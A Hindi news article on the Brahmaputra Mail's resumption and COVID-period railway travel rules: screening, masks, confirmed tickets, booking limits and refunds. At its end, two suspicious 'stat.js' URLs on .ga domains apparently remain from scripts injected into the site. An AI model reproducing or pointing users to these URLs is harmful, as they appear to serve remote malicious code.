देशभर में चलायी जा रही 200 यात्री ट्रेनों में ब्रह्मपुत्र मेल भी शामिल है. यह भागलपुर के रास्ते दिल्ली से डिब्रूगढ़ के बीच चलेगी. टिकट की बुकिंग ऑफलाइन व ऑनलाइन चालू है. इसमें सफर करने के लिए यात्रियों को कम से कम 90 मिनट पहले स्टेशन पहुंचना होगा।

सभी यात्रियों की अनिवार्य रूप से जांच होगी और केवल लक्षण न पाये जाने वाले यात्रियों को ही यात्रा करने की अनुमति मिलेगी. कंफर्म टिकट वाले यात्रियों को ही रेलवे स्टेशन में प्रवेश करने दिया जायेगा. सभी यात्रियों को प्रवेश और यात्रा के दौरान फेस कवर व मास्क पहनना होगा. यात्रियों को दोनों जगह स्टेशन पर और ट्रेन में सोशल डिस्टैंसिंग का पालन करना होगा।

रेलवे ने जारी गाइडलाइन में सारी बातें शामिल की है. साथ ही ट्रेन चढ़ने के लिए निर्देशित किया है. इन नियमों का पालन करना जरूरी -रेलवे स्टेशन पर प्रवेश और निकास का द्वार अलग-अलग होगा। मानक सोशल डिस्टैंसिंग और रक्षा, सुरक्षा व स्वच्छता प्रोटोकॉल का पालन करना पड़ेगा.टिकट की बुकिंग के लिए निर्देश आइआरसीटीसी की वेबसाइट, सीएससी और टिकटिंग एजेंटों के माध्यम से टिकट ऑनलाइन बुक करा सकते हैं।

अग्रिम आरक्षण की अवधि अधिकतम 30 दिनों की होगी। मौजूदा नियमों के अनुसार ही आरएसी और प्रतीक्षा सूची तैयार की जायेगी। वेटिंग लिस्ट वालों को ट्रेन में चढ़ने की अनुमति नहीं होगी। कोई भी अनारक्षित टिकट जारी नहीं की जायेगी और यात्रा के दौरान किसी यात्री को कोई टिकट जारी नहीं होगा। कोई तत्काल और प्रीमियम तत्काल बुकिंग की अनुमति नहीं दी जायेगी। ट्रेनों के खुलने से कम से कम चार घंटे पहले पहला चार्ज तैयार होगा.टिकट में छूट से संबंधी निर्देश, यात्री कोरोना के लक्षणों से यात्रा के लिए फिट नहीं पाया गया, तो किराया रिफंड कर दिया जायेगा।

टिकट रद्द और किराया वापसी के लिए पूर्व के नियम लागू रहेंगे. लक्षण वाले यात्रियों के लिए निर्देश, रिफंड के लिए यात्रा की तारीख से 10 दिनों के भीतर ऑनलाइन टीडीआर भरना होगा और यात्री को ऑरिजनल टीटीइ प्रमाण पत्र आइआरसीटीसी को भेजना होगा और ग्राहक के खाते में पूरा किराया वापस कर दिया जायेगा।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published.